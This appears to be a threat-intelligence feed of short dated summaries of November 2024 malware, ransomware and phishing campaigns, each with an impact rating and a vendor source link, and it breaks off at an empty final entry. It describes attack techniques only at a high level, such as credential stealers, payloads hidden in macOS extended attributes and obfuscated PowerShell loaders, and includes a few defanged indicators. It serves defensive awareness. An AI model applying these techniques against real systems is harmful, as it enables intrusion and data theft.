Cisco Talos researchers have uncovered a new information-stealing campaign operated by a Vietnamese-speaking threat actor targeting the education sector in India and government organizations in European countries, including Sweden and Denmark. The attacker leverages Python-based malware called PXA Stealer to exfiltrate sensitive information from victims, including credentials for various online accounts, VPN and FTP clients, financial information, browser cookies, and data from gaming software. This stealer is capable of decrypting the master passwords stored in victims' browsers to access and steal their stored credentials. The attacker also operates the Telegram channel “Mua Bán Scan MINI” where they sell Facebook accounts, Zalo accounts, SIM cards, credentials, and money laundering data.
Source: https://blog.talosintelligence.com/new-pxa-stealer/
2024-11-13
Strela_Stealer_Updates
LOW
Intel Source:
Security Intelligence
Intel Name:
Strela_Stealer_Updates
Date of Scan:
2024-11-13
Impact:
LOW
Summary:
Researchers from IBM X-Force have uncovered a cybercriminal group called Hive0145 which is targeting victims across Europe, mainly in Spain, Germany, and Ukraine, with Strela Stealer malware. This malware is distributed through phishing emails disguised as real invoice notifications, which were stolen using previously exfiltrated email credentials. The stealer is designed to steal login credentials saved in Microsoft Outlook and Mozilla Thunderbird. Hive0145 is a financially motivated initial access broker (IAB), potentially the sole operator of Strela Stealer, and has been active since 2022. Their continuous activity raises the risk of attacks for individuals and organizations across Europe.
Source: https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/
2024-11-13
LightSpy_Malware_Campaign
MEDIUM
Intel Source:
Blackberry
Intel Name:
LightSpy_Malware_Campaign
Date of Scan:
2024-11-13
Impact:
MEDIUM
Summary:
BlackBerry researchers have identified an advanced malware campaign called LightSpy, likely operated by the Chinese cyber-espionage group APT41. The malware was first discovered in 2020 and primarily focuses on targets in the Asia-Pacific region. APT41 has now introduced a new malware framework for Windows called DeepData which enables the group to collect sensitive data across platforms. This framework allows APT41 to monitor communications on major messaging platforms like WhatsApp, Telegram, Signal, and WeChat as well as track emails (Outlook) and corporate communication tools such as DingDing and Feishu. Additionally, it can steal browser credentials, application passwords, and data from password managers like KeePass. DeepData also collects detailed system intelligence, including network configurations and installed software, and can record audio.
Source: https://blogs.blackberry.com/en/2024/11/lightspy-apt41-deploys-advanced-deepdata-framework-in-targeted-southern-asia-espionage-campaign
2024-11-13
HawkEye_Malware
LOW
Intel Source:
Any.Run
Intel Name:
HawkEye_Malware
Date of Scan:
2024-11-13
Impact:
LOW
Summary:
Researchers at Any.Run have discovered a malware called HawkEye, also known as PredatorPain. The malware began as a basic keylogger but has since become a stealer capable of gathering sensitive information. This malware is mainly distributed through spear-phishing emails that trick victims into downloading infected files, often disguised as documents, compressed files, or other types of loaders. Once downloaded, it can steal login credentials from email accounts, browser information, and FTP credentials, and capture screenshots. It also gathers system and network information and often hides itself in temporary folders or Windows directories to avoid detection. In some campaigns, HawkEye has been combined with other malware loaders, such as Remcos and Pony.
Source: https://any.run/cybersecurity-blog/hawkeye-malware-technical-analysis/?utm_source=twitter&utm_medium=post&utm_campaign=hawkeye_analysis&utm_content=linktoblog&utm_term=131124
2024-11-13
Sliver_C2_and_Ligolo_ng
LOW
Intel Source:
Hunt.IO
Intel Name:
Sliver_C2_and_Ligolo_ng
Date of Scan:
2024-11-13
Impact:
LOW
Summary:
Sliver is a C2 framework developed by Bishop Fox for red teaming; however, it has become popular among cybercriminals and state-sponsored attackers as a stealthy alternative to Cobalt Strike. Sliver works on Windows, macOS, and Linux and uses secure communication channels like mTLS, WireGuard, and HTTPS to keep activities hidden. It allows attackers to inject malicious code and run .NET programs directly in memory. Similarly, Ligolo-ng is another tool that helps attackers move through networks by creating a secure reverse connection, enabling them to access and explore compromised internal systems.
Source: https://hunt.io/blog/sliver-c2-ligolo-ng-targeting-yc
2024-11-13
Melofee_Backdoor_Variant_Targets_RHEL_7_9
MEDIUM
Intel Source:
Xlabs
Intel Name:
Melofee_Backdoor_Variant_Targets_RHEL_7_9
Date of Scan:
2024-11-13
Impact:
MEDIUM
Summary:
XLab's researchers have detected an ELF file named pskt from IP address 45[.]92[.]156[.]166, which was undetected on VirusTotal. The file triggered two alerts—an Overlay section and a communication domain mimicking Microsoft. Analysis revealed it as a new variant of the Melofee backdoor, targeting Red Hat Enterprise Linux (RHEL) 7.9. Originally exposed in March 2023 and linked to the APT group Winnti, this variant features upgrades including an RC4-encrypted kernel driver for masking traces, enhanced persistence, single-instance control, and changes in network connection class names. The modifications, observed through examination of sample Run-Time Type Information (RTTI), suggest the ongoing evolution of the Melofee backdoor to evade detection.
Source: https://blog.xlab.qianxin.com/analysis_of_new_melofee_variant_en/
2024-11-13
Stealthy_Attributes_of_APT_Lazarus
MEDIUM
Intel Source:
Group-IB
Intel Name:
Stealthy_Attributes_of_APT_Lazarus
Date of Scan:
2024-11-13
Impact:
MEDIUM
Summary:
APT Lazarus, a notorious cyber threat group, has recently employed a novel technique to conceal malicious code within custom extended attributes (EAs) on macOS systems. Extended attributes, which store additional metadata about files, were used to smuggle trojan payloads in a way that bypasses traditional detection mechanisms, such as antivirus software and macOS’s Gatekeeper. Group-IB researchers discovered a trojan, named RustyAttr, built using the Tauri framework, which fetches and executes malicious scripts from EAs when the application is launched. These applications were initially signed with a leaked certificate, later revoked by Apple, but still remain undetected by security tools.
Source: https://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/
2024-11-13
Phishing_Domains_For_The_Holidays
MEDIUM
Intel Source:
Palo Alto
Intel Name:
Phishing_Domains_For_The_Holidays
Date of Scan:
2024-11-13
Impact:
MEDIUM
Summary:
In early November, a threat actor registered over 550 domains impersonating legitimate booking sites, banks, crypto wallets, and restaurants, using the email address ilotirabec207@gmail[.]com for all the registrations. Analysis revealed that many of these domains were previously registered and "dropcaught" before 2024, with some actively used in phishing scams targeting victims to steal sensitive information such as login credentials and financial details. While most of the domains are still stockpiled, 90% of the active ones use Cloudflare for domain fronting, making it harder to trace, while 10% are hosted on shared servers, which could expose the true hosting IP addresses.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-11-13-phishing-domains-for-the-holidays.txt
2024-11-13
Tibetan_Websites_Targeted_in_Cobalt_Strike_Attack
MEDIUM
Intel Source:
Recorded Future
Intel Name:
Tibetan_Websites_Targeted_in_Cobalt_Strike_Attack
Date of Scan:
2024-11-13
Impact:
MEDIUM
Summary:
In May 2024, the Chinese state-sponsored threat actor group TAG-112 compromised at least two Tibetan community websites, injecting malicious JavaScript that spoofed a TLS certificate error page to deliver Cobalt Strike. The attack was obfuscated through Cloudflare-protected infrastructure, making it difficult to trace. Insikt Group researchers have identified six Cobalt Strike Beacon samples linked to the campaign, and as of now, the websites remain compromised, with parts of the malicious infrastructure still active. TAG-112 shares overlap with the previously identified group TAG-102 (Evasive Panda), which also targets the Tibetan community.
Source: https://go.recordedfuture.com/hubfs/reports/cta-cn-2024-1112.pdf
2024-11-12
APT_Actors_Embed_Malware_within_macOSFlutter
MEDIUM
Intel Source:
Jamf Threat Labs
Intel Name:
APT_Actors_Embed_Malware_within_macOSFlutter
Date of Scan:
2024-11-12
Impact:
MEDIUM
Summary:
Jamf Threat Labs has identified a new form of malware targeting macOS devices, likely linked to North Korean APT groups. The malware, which includes variants built using Go, Python, and Flutter, was designed to evade detection through obfuscation techniques. Notably, the Flutter-built application, which masquerades as a minesweeper game, was signed with a legitimate developer certificate before being revoked by Apple. This malware connects to a known DPRK-associated domain and uses AppleScript to execute remote commands, highlighting its ability to bypass security checks, including Apple's notarization process.
Source: https://www.jamf.com/blog/jamf-threat-labs-apt-actors-embed-malware-within-macos-flutter-applications/
2024-11-12
LodaRAT_Malware
LOW
Intel Source:
Rapid7
Intel Name:
LodaRAT_Malware
Date of Scan:
2024-11-12
Impact:
LOW
Summary:
Rapid7 researchers have discovered a new version of LodaRAT that includes advanced features to steal cookies and passwords from the Microsoft Edge and Brave browsers. The malware first appeared in 2016 and is written in AutoIt. LodaRAT has multiple capabilities such as data collection and exfiltration, delivering additional malware, screen capture, control over the victim's camera or mouse, and the ability to spread within compromised networks. Initially, it was distributed through phishing emails and vulnerability exploits, but it is now being distributed via DonutLoader and Cobalt Strike. It also masquerades as popular software like Discord, Skype, and Windows Update. The campaign appears to target victims globally, with a significant portion in the USA.
Source: https://www.rapid7.com/blog/post/2024/11/12/lodarat-established-malware-new-victim-patterns/
2024-11-12
Hamas_Affiliated_Threat_Actor_WIRTE
MEDIUM
Intel Source:
Checkpoint
Intel Name:
Hamas_Affiliated_Threat_Actor_WIRTE
Date of Scan:
2024-11-12
Impact:
MEDIUM
Summary:
Researchers at CheckPoint have identified a Middle East based threat actor called WIRTE which has been active since 2018 and is linked to Hamas via the Gaza Cybergang. The group primarily focuses on intelligence gathering through politically motivated espionage and targets entities in the Palestinian Authority, Jordan, Iraq, Egypt, and Saudi Arabia. This group has expanded its reach from cyber espionage operations to destructive attacks. Recently, the group initiated an email campaign impersonating ESET, a cybersecurity firm, to spread a wiper malware called SameCoin. These emails claimed that the recipients' devices had been compromised by attackers, urging them to click a link that secretly deployed the malware. This malware, which impersonated the Israeli National Cyber Directorate, was designed to destroy data rather than steal it.
Source: https://research.checkpoint.com/2024/hamas-affiliated-threat-actor-expands-to-disruptive-activity/
2024-11-12
New_Formbook_Malware_Campaign
LOW
Intel Source:
CERT-AGID
Intel Name:
New_Formbook_Malware_Campaign
Date of Scan:
2024-11-12
Impact:
LOW
Summary:
Researchers at CERT-AGID identified a malspam campaign targeting users across Italy. In this Italian campaign, users are infected with Formbook malware, which is known for stealing information. Users receive an urgent email about unpaid invoices which pressures them to quickly open an attached 7Z compressed file called “Last reminder for payment of overdue invoice”. Once the user opens the file, the final payload executes on the victim's machine and begins its infostealing activities.
Source: https://cert-agid.gov.it/news/studio-di-una-nuova-campagna-formbook-attiva-in-italia/
2024-11-12
GoblinRAT_A_Linux_Backdoor
LOW
Intel Source:
Solar
Intel Name:
GoblinRAT_A_Linux_Backdoor
Date of Scan:
2024-11-12
Impact:
LOW
Summary:
Solar researchers have discovered a malware named GoblinRAT which has infected systems across multiple organizations for over two years. The malware is written in Go and is highly capable of hiding itself and its activity. It often masquerades as legitimate services like Zabbix and Red Hat subscription services. Attackers use compromised websites and DNS to communicate with GoblinRAT, and every compromised machine has a unique address. They use Linux tools such as shred to clear logs and scp and curl for data exfiltration, leaving minimal traces. Although no specific group has been linked to GoblinRAT, it is clear the operators are targeting confidential information from government agencies and contractors.
Source: https://rt-solar.ru/solar-4rays/blog/4861/
2024-11-12
AsyncRAT_Infection_Tactics_via_Open_Directories
LOW
Intel Source:
Any.Run
Intel Name:
AsyncRAT_Infection_Tactics_via_Open_Directories
Date of Scan:
2024-11-12
Impact:
LOW
Summary:
Researchers from Any.Run have observed two methods by which attackers are distributing AsyncRAT through open internet directories. In the first method, a VBS script downloads and extracts a JPG which contains additional scripts that eventually trigger AsyncRAT. The second method also uses a text file and a JPG file containing a VBS script that downloads and executes a PowerShell file to load AsyncRAT directly into memory. Both methods involve multiple stages, including PowerShell, batch files, and scheduled tasks, to keep the malware active on the infected system.
Source: https://any.run/cybersecurity-blog/asyncrat-open-directories-infection-analysis/
2024-11-12
Multi_Stage_PowerShell_Attack_with_Chisel
LOW
Intel Source:
Cyble
Intel Name:
Multi_Stage_PowerShell_Attack_with_Chisel
Date of Scan:
2024-11-12
Impact:
LOW
Summary:
Researchers from Cyble have discovered an advanced, multi-phase PowerShell campaign that initiates scripts for persistence and covert C&C communication using a suspicious LNK file. Chisel as well as a Netskope proxy are part of the attack's multi-layered architecture, which enables lateral movement and secret data exfiltration within compromised networks.
Source: https://cyble.com/blog/dissecting-a-multi-stage-powershell-campaign-using-chisel/
2024-11-12
Iranian_Dream_Job_Campaign_Targets_Aerospace
MEDIUM
Intel Source:
ClearSky
Intel Name:
Iranian_Dream_Job_Campaign_Targets_Aerospace
Date of Scan:
2024-11-12
Impact:
MEDIUM
Summary:
ClearSky researchers have identified the “Iranian Dream Job campaign,” in which the Iranian threat actor TA455 targeted the aerospace industry by offering fake job opportunities. The campaign distributed the SnailResin malware, which activates the SlugResin backdoor. They attribute both malware programs to Charming Kitten, an Iranian threat actor subgroup. However, some cyber research companies detected the malware as being associated with the North Korean Kimsuky/Lazarus APT group.
Source: https://www.clearskysec.com/wp-content/uploads/2024/11/Iranian-Dream-Job-ver1.pdf
2024-11-11
FakeBat_Malware_Returns_via_Google_Ads
LOW
Intel Source:
Malwarebytes
Intel Name:
FakeBat_Malware_Returns_via_Google_Ads
Date of Scan:
2024-11-11
Impact:
LOW
Summary:
Researchers from Malwarebytes have found the reemergence of FakeBat (aka Eugenloader, PaykLoader) malware via a malicious Google ad for the Notion app, indicating a comeback in the use of search engine ads to distribute malware. Last observed in July 2024, FakeBat uses brand imitation strategies to appear authentic, luring victims into downloading follow-up payloads such as Lumma stealer, exhibiting threat actors' ability to avoid detection.
Source: https://www.malwarebytes.com/blog/news/2024/11/hello-again-fakebat-popular-loader-returns-after-months-long-hiatus
2024-11-11
Ymir_Ransomware
MEDIUM
Intel Source:
Securelist
Intel Name:
Ymir_Ransomware
Date of Scan:
2024-11-11
Impact:
MEDIUM
Summary:
Securelist researchers have discovered a new ransomware family named Ymir, which has been identified in active use by attackers. The adversary initially gained system access via PowerShell remote control commands and deployed tools like Process Hacker and Advanced IP Scanner to compromise security. Ymir's execution involved sophisticated memory-based operations using functions like malloc, memmove, and memcmp, making it more difficult to detect.
Source: https://securelist.com/new-ymir-ransomware-found-in-colombia/114493/
2024-11-11
Uncovering_RedLine_Backend_Operations
LOW
Intel Source:
ESET Research
Intel Name:
Uncovering_RedLine_Backend_Operations
Date of Scan:
2024-11-11
Impact:
LOW
Summary:
Researchers from ESET have identified over 1,000 IP addresses associated with RedLine Stealer's control panels and discovered modules disclosing its operational methods. The 2023 version used the Windows Communication Framework, whereas the 2024 version switched to a REST API. They also discovered evidence that RedLine Stealer and META Stealer were most likely created by the same person.
Source: https://www.welivesecurity.com/en/eset-research/life-crooked-redline-analyzing-infamous-infostealers-backend/
2024-11-11
Vidar_Malware_Targets_Italian_PEC_Mailboxes_Again
LOW
Intel Source:
CERT-AGID
Intel Name:
Vidar_Malware_Targets_Italian_PEC_Mailboxes_Again
Date of Scan:
2024-11-11
Impact:
LOW
Summary:
The Vidar malware reappears a week after a previous wave of attacks, using hijacked PEC mailboxes to target Italian email accounts. This new campaign uses similar techniques as before, including the use of VBS payloads instead of JS files, and maintains the abuse of .top domains. However, the URLs for downloading malicious components have been updated to evade detection. Vidar continues to pose a significant threat, capable of stealing sensitive data, and the use of trusted PEC mailboxes increases the likelihood of recipients being tricked into opening malicious emails.
Source: https://cert-agid.gov.it/news/vidar-nuovamente-attivo-in-italia-tramite-caselle-pec-compromesse-nuova-campagna-con-url-aggiornati/
2024-11-11
Newly_Registered_Domains_in_JapanTargeted_Phishing
LOW
Intel Source:
Palo Alto
Intel Name:
Newly_Registered_Domains_in_JapanTargeted_Phishing
Date of Scan:
2024-11-11
Impact:
LOW
Summary:
Unit 42 researchers identified a prolonged phishing campaign targeting a wide range of sectors in Japan, including financial institutions, electric utilities, logistics services, and more. The attackers often register domains for temporary landing pages, typically hosted on public cloud platforms.
Source: https://x.com/Unit42_Intel/status/1856063191203057995
2024-11-08
Earth_Estries_Exploits_Exchange_Vulnerabilities
LOW
Intel Source:
Trend Micro
Intel Name:
Earth_Estries_Exploits_Exchange_Vulnerabilities
Date of Scan:
2024-11-08
Impact:
LOW
Summary:
Researchers from Trend Micro have discovered that Earth Estries uses two attack chains that exploit Microsoft Exchange and network adaptor vulnerabilities. The first chain uses CAB files to execute tools like PsExec and Trillclient, while the second chain uses cURL to execute malware such as Zingdoor. Earth Estries maintains persistence through tool upgrades and backdoors that enable lateral movement, credential theft, and data exfiltration via anonymous methods.
Source: https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html
2024-11-08
New_Tactics_in_CloudComputating_Operations
LOW
Intel Source:
Securelist
Intel Name:
New_Tactics_in_CloudComputating_Operations
Date of Scan:
2024-11-08
Impact:
LOW
Summary:
Researchers from Securelist have discovered a tactical shift in the CloudComputating group, which used the QSC framework with the Quarian backdoor in targeted telecom campaigns. The adoption of a protected Quarian variant and the QSC architecture demonstrates the group's expanding toolbox and adaptability, emphasizing the importance of constant monitoring.
Source: https://securelist.com/cloudcomputating-qsc-framework/114438/
2024-11-08
New_Campaign_Uses_Remcos_RAT
LOW
Intel Source:
Fortinet
Intel Name:
New_Campaign_Uses_Remcos_RAT
Date of Scan:
2024-11-08
Impact:
LOW
Summary:
Researchers at Fortinet have identified a phishing campaign where attackers are distributing a new variant of the Remcos RAT, a remote administration tool. This tool is often misused by cybercriminals to control and steal information from victims' machines. The attack starts with a phishing email containing a malicious Excel document that exploits a vulnerability (CVE-2017-0199) to download and run an HTA file, which executes malicious scripts on the victim's device. These scripts download a "dllhost.exe" file that initiates a PowerShell process.
Source: https://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims
2024-11-08
APT_C_08_Attack_Vectors_and_Trends_Analysis
LOW
Intel Source:
360 Threat Intelligence Center
Intel Name:
APT_C_08_Attack_Vectors_and_Trends_Analysis
Date of Scan:
2024-11-08
Impact:
LOW
Summary:
APT-C-08, also known as Manlinghua or Bitter, is a South Asia-based APT group with a strong political agenda. The group primarily targets government entities, military industries, universities, and overseas institutions in South Asia and neighboring regions. Their main objective is to steal sensitive information through various attack vectors, often using malicious documents to lure users into downloading payloads. Over the past year, numerous attack samples have been identified, including PUB, PDF, macro documents, CHM files, and other less commonly known formats.
Source: https://mp.weixin.qq.com/s/pvm0QUAMS0U5dIge1ImcCQ
2024-11-08
Helldown_Ransomware_Group
LOW
Intel Source:
Linkedin
Intel Name:
Helldown_Ransomware_Group
Date of Scan:
2024-11-08
Impact:
LOW
Summary:
The Helldown Ransomware Group has recently emerged on the Surface Web, having targeted 31 victims. Primarily affecting Windows systems, the group has focused on industries such as services, healthcare, construction, manufacturing, and retail, with the United States, Germany, and France being the most targeted countries. The group's ransom note appears to be a modified version of one used by the 8Base Ransomware Group, featuring intentional spelling errors like "cantact" and "setle". Additionally, the ransom note is partial and similar to notes from the Dark Angels and White Rabbit groups. The attackers claim to have exploited zero-day vulnerabilities in their campaigns.
Source: https://www.linkedin.com/posts/rakesh-krishnan-6179a94b_infosec-helldown-ransomware-activity-7260536280906629121-0YxQ?utm_source=share&utm_medium=member_desktop
2024-11-08
Roblox_Developers_Targeted_with_NPM_Packages
LOW
Intel Source:
Socket
Intel Name:
Roblox_Developers_Targeted_with_NPM_Packages
Date of Scan:
2024-11-08
Impact:
LOW
Summary:
Socket researchers have discovered five malicious npm packages targeting Roblox users and developers. These packages, named node-dlls, ro.dll, autoadv, and two versions of rolimons-api, mimic legitimate modules: the attacker used typosquatted packages to trick developers into installing malware such as the Skuld infostealer and Blank Grabber. Skuld is written in Go and Blank Grabber is Python-based malware. Both are capable of extracting data from Windows systems and target Discord, popular web browsers, and cryptocurrency wallets to steal sensitive information like credentials, financial details, and personal data. These attackers often use GitHub to host malicious files and Discord and Telegram for C2 operations.
Source: https://socket.dev/blog/roblox-developers-targeted-with-npm-packages-infected-with-infostealers
2024-11-07
GuLoader_Malware_Targeting_European_Industry
LOW
Intel Source:
Cado Security Labs
Intel Name:
GuLoader_Malware_Targeting_European_Industry
Date of Scan:
2024-11-07
Impact:
LOW
Summary:
Researchers at Cado Security have uncovered a GuLoader malware campaign targeting industrial and engineering companies across Europe, including countries such as Romania, Poland, Germany, and Kazakhstan. GuLoader malware has been active since 2019 and is used to deliver RATs. In this campaign, attackers are sending spear-phishing emails with fake order inquiries that contain an archive file attachment in formats like ISO, 7z, gzip, or RAR. These emails come from fake companies or compromised accounts and often hijack ongoing email conversations to appear legitimate. The attachment contains a compressed batch file which executes a PowerShell script that initiates GuLoader malware.
Source: https://www.cadosecurity.com/blog/guloader-targeting-european-industrial-companies
2024-11-07
Androxgh0st_Botnet
LOW
+
Intel Source:
Cloudsek
Intel Name:
Androxgh0st_Botnet
Date of Scan:
2024-11-07
Impact:
LOW
Summary:
CloudSEK researchers have uncovered a re-emerged botnet, Androxgh0st, which they link to the earlier Mozi botnet. Mozi originally targeted IoT devices, but the updated botnet also goes after web servers and applications, including Cisco ASA, Atlassian Jira, and PHP frameworks. Androxgh0st steals credentials and maintains persistent access through remote code execution, exploiting unpatched vulnerabilities to infiltrate critical infrastructure and establish backdoor access.
Source: https://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave
2024-11-07
Hidden_Risk_Malware
MEDIUM
+
Intel Source:
Sentinelone
Intel Name:
Hidden_Risk_Malware
Date of Scan:
2024-11-07
Impact:
MEDIUM
Summary:
SentinelOne researchers have identified a new campaign, Hidden Risk, run by the North Korean state-sponsored group BlueNoroff against cryptocurrency and DeFi businesses. The phishing emails contain a link that appears to lead to a PDF document but actually downloads a malicious Swift-based macOS application disguised as a PDF reader. The fake application displays a decoy PDF on cryptocurrency topics such as "Hidden Risk Behind New Surge of Bitcoin Price", "Altcoin Season 2.0 - The Hidden Gems to Watch" and "New Era for Stablecoins and DeFi", while silently downloading a backdoor called Growth. The backdoor gathers information about the infected system, communicates with an attacker-controlled server, and can receive and execute commands.
Source: https://www.sentinelone.com/labs/bluenoroff-hidden-risk-threat-actor-targets-macs-with-fake-crypto-news-and-novel-persistence/
2024-11-07
eBay_Users_Targeted_by_Malicious_Ads
LOW
+
Intel Source:
Malwarebytes
Intel Name:
eBay_Users_Targeted_by_Malicious_Ads
Date of Scan:
2024-11-07
Impact:
LOW
Summary:
Malwarebytes researchers have discovered a large malvertising campaign targeting eBay customers in the United States through bogus Google ads that send users to scam sites posing as eBay help pages. Victims are encouraged to dial fake support numbers, exposing them to remote access scams and financial loss.
Source: https://www.malwarebytes.com/blog/scams/2024/11/large-ebay-malvertising-campaign-leads-to-scams
2024-11-07
Interlock_Ransomware
MEDIUM
+
Intel Source:
Cisco Talos
Intel Name:
Interlock_Ransomware
Date of Scan:
2024-11-07
Impact:
MEDIUM
Summary:
Cisco Talos researchers have uncovered a new ransomware group named Interlock that first emerged in September 2024. The group conducts big-game hunting and double-extortion attacks, targeting healthcare, technology, and government organisations in the U.S. and manufacturing in Europe. It operates a data leak site, "Worldwide Secrets Blog", where it publishes victims' data and provides a contact email for negotiation. Interlock gains initial access through a remote access tool disguised as a browser update, then runs PowerShell scripts and tooling to steal credentials and log keystrokes before deploying the ransomware. The group primarily uses AnyDesk and PuTTY for lateral movement and Azure Storage Explorer and AzCopy for data exfiltration.
Source: https://blog.talosintelligence.com/emerging-interlock-ransomware/
2024-11-07
CopyRhightadamantys_Campaign
LOW
+
Intel Source:
Checkpoint
Intel Name:
CopyRhightadamantys_Campaign
Date of Scan:
2024-11-07
Impact:
LOW
Summary:
Check Point researchers have identified a phishing campaign, dubbed CopyRh(ight)adamantys, that deploys a new version of the Rhadamanthys stealer (version 0.7). The phishing emails impersonate multiple companies and claim that the recipient has committed copyright violations on their Facebook page. The emails are sent from numerous Gmail accounts and include a link to download and install Rhadamanthys. The campaign targets the media, entertainment, and technology sectors across the United States, Europe, East Asia, and South America.
Source: https://research.checkpoint.com/2024/massive-phishing-campaign-deploys-latest-rhadamanthys-version/
2024-11-07
0ktapus_Threat_Group
LOW
+
Intel Source:
WIZ Blog
Intel Name:
0ktapus_Threat_Group
Date of Scan:
2024-11-07
Impact:
LOW
Summary:
Wiz researchers have profiled a financially motivated group called 0ktapus (also known as Scattered Spider, UNC3944, Storm-0875, and Starfraud) that has been active since 2022. The group targets cloud infrastructure and gains initial access through IT service desk personnel and administrators in order to steal data, deploy ransomware, and extort victims. It relies primarily on social engineering, including smishing, vishing, MFA fatigue, and SIM hijacking. 0ktapus campaigns use phishing landing pages that mimic the legitimate login portals of targeted organizations; when victims enter their credentials on these fake sites, the group captures and reuses them to infiltrate corporate networks.
Source: https://www.wiz.io/blog/unmasking-phishing-strategies-for-identifying-0ktapus-domains
2024-11-07
Unmasking_VEILDrive
MEDIUM
+
Intel Source:
Hunters
Intel Name:
Unmasking_VEILDrive
Date of Scan:
2024-11-07
Impact:
MEDIUM
Summary:
Hunters researchers have uncovered an ongoing campaign, active since 2023, called VEILDrive. The campaign abuses Microsoft cloud services (Teams, SharePoint, Quick Assist, and OneDrive) and appears to originate from Russia. The attackers use these platforms to deliver spear-phishing messages and to host the malware. The VEILDrive malware is a Java-based .jar file that is unobfuscated and easy to read, and it is controlled through OneDrive, which serves as the C2 channel on the compromised machine.
Source: https://www.hunters.security/en/blog/veildrive-microsoft-services-malware-c2#title5
2024-11-07
Silent_Skimmer_Returns
LOW
+
Intel Source:
Palo Alto
Intel Name:
Silent_Skimmer_Returns
Date of Scan:
2024-11-07
Impact:
LOW
Summary:
Palo Alto Networks Unit 42 researchers have identified that a financially motivated threat group linked to the Silent Skimmer campaign is actively targeting companies involved in payment infrastructure and online payment gateways. The group returned with largely the same TTPs, stealing payment information by exploiting vulnerabilities in older versions of Telerik UI, a web development component. These vulnerabilities gave the attackers access to servers at a North American multinational, from which they exfiltrated payment data. The attackers use privilege-escalation tools and reverse proxies to keep control of the servers, and a Python script to extract payment data from company databases into a CSV file for exfiltration.
Source: https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/
2024-11-07
Fickle_Stealer
LOW
+
Intel Source:
Trellix
Intel Name:
Fickle_Stealer
Date of Scan:
2024-11-07
Impact:
LOW
Summary:
Trellix researchers have discovered a Rust-based information stealer called Fickle that has been active since May 2024. It spreads through phishing emails with malicious attachments, drive-by downloads, exploit kits, and social engineering, and is packaged in various file formats such as Word documents, executables, and shortcut files. Fickle Stealer uses a PowerShell script to bypass User Account Control (UAC) and steals files, system details, browser data, and cryptocurrency wallet information from compromised systems. It can also download files, take screenshots, and delete itself after displaying a fake error message. The stealer masquerades as GitHub Desktop for Windows and carries an invalid digital signature.
Source: https://www.trellix.com/blogs/research/new-stealer-uses-invalid-cert-to-compromise-systems/
2024-11-06
Python_RAT_with_Screensharing_Feature
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Python_RAT_with_Screensharing_Feature
Date of Scan:
2024-11-06
Impact:
LOW
Summary:
SANS ISC researchers have analyzed a Python-based Remote Access Trojan (RAT) that stands out for its user-friendly screen-sharing capability. The diary walks through the RAT's implementation and key features and shows how it is used for remote control of compromised systems.
Source: https://isc.sans.edu/diary/Python+RAT+with+a+Nice+Screensharing+Feature/31414/
2024-11-06
Gootloader_Campaign
LOW
+
Intel Source:
Sophos
Intel Name:
Gootloader_Campaign
Date of Scan:
2024-11-06
Impact:
LOW
Summary:
Sophos researchers have identified a GootLoader campaign that uses SEO poisoning to trick victims into downloading malicious files. Attackers manipulate search engine results so that compromised websites appear at the top of the rankings. In this campaign, victims searching for queries such as "Are Bengal cats legal in Australia?" are redirected to compromised sites hosting the GootLoader payload. Once the victim downloads and opens the file, the first-stage GootLoader payload runs; if it goes undetected, it deploys the second-stage payload, GootKit, an info-stealer and remote access trojan.
Source: https://news.sophos.com/en-us/2024/11/06/bengal-cat-lovers-in-australia-get-psspsspssd-in-google-driven-gootloader-campaign/
2024-11-06
Winos40_Spread_Through_Game_Application
LOW
+
Intel Source:
FortiGuard Labs
Intel Name:
Winos40_Spread_Through_Game_Application
Date of Scan:
2024-11-06
Impact:
LOW
Summary:
FortiGuard researchers have discovered campaigns spreading the Winos4.0 malicious framework, which allows attackers to control compromised devices and carry out further malicious actions. Winos4.0 is built on Gh0st RAT, gives attackers flexible control, and has appeared in multiple campaigns such as Silver Fox. The malware is disguised within game-related applications, including installation tools, speed boosters, and optimization utilities, and appears to target the education sector. Like Cobalt Strike and Sliver, Winos4.0 lets attackers maintain control over compromised systems through encrypted communications with their C2 servers.
Source: https://www.fortinet.com/blog/threat-research/threat-campaign-spreads-winos4-through-game-application
2024-11-06
SteelFox_Malware_Targets_Mass_Data_Theft
LOW
+
Intel Source:
Securelist
Intel Name:
SteelFox_Malware_Targets_Mass_Data_Theft
Date of Scan:
2024-11-06
Impact:
LOW
Summary:
Securelist researchers have discovered SteelFox, a sophisticated crimeware package capable of large-scale data theft that drops both a stealer and a cryptocurrency miner. Written in modern C++, it uses TLSv1.3 and SSL pinning to protect its exfiltration channel and collects a large volume of user data indiscriminately for later analysis.
Source: https://securelist.com/steelfox-trojan-drops-stealer-and-miner/114414/
2024-11-06
PowerShell_Obfuscation_by_Black_Basta
LOW
+
Intel Source:
Threatdown
Intel Name:
PowerShell_Obfuscation_by_Black_Basta
Date of Scan:
2024-11-06
Impact:
LOW
Summary:
ThreatDown researchers have documented Black Basta ransomware operators using PowerShell scripts with encoded commands and covert execution switches to avoid detection and install Cobalt Strike beacons. This living-off-the-land technique lets them blend in with legitimate administrative activity, making it harder for security teams to detect their presence before the ransomware is launched.
Source: https://www.threatdown.com/blog/how-black-basta-used-powershell-to-set-up-a-cobalt-strike-beacon/
2024-11-06
RunningRAT_Shift_to_Crypto_Mining_Payload
LOW
+
Intel Source:
Hunt.IO
Intel Name:
RunningRAT_Shift_to_Crypto_Mining_Payload
Date of Scan:
2024-11-06
Impact:
LOW
Summary:
Hunt.IO researchers have examined the evolving use of RunningRAT, a remote access trojan originally known for remote access and information stealing, which has now been observed deploying crypto-mining payloads. The analysis centres on a RunningRAT sample found in an open online repository and linked to a second server hosting crypto-mining tools; the malware also communicates with a separate VPS, indicating a coordinated infrastructure for staging and delivery.
Source: https://hunt.io/blog/runningrat-from-remote-access-to-crypto-mining
2024-11-05
Venture_Wolf_Threat_Group
MEDIUM
+
Intel Source:
BI Zone
Intel Name:
Venture_Wolf_Threat_Group
Date of Scan:
2024-11-05
Impact:
MEDIUM
Summary:
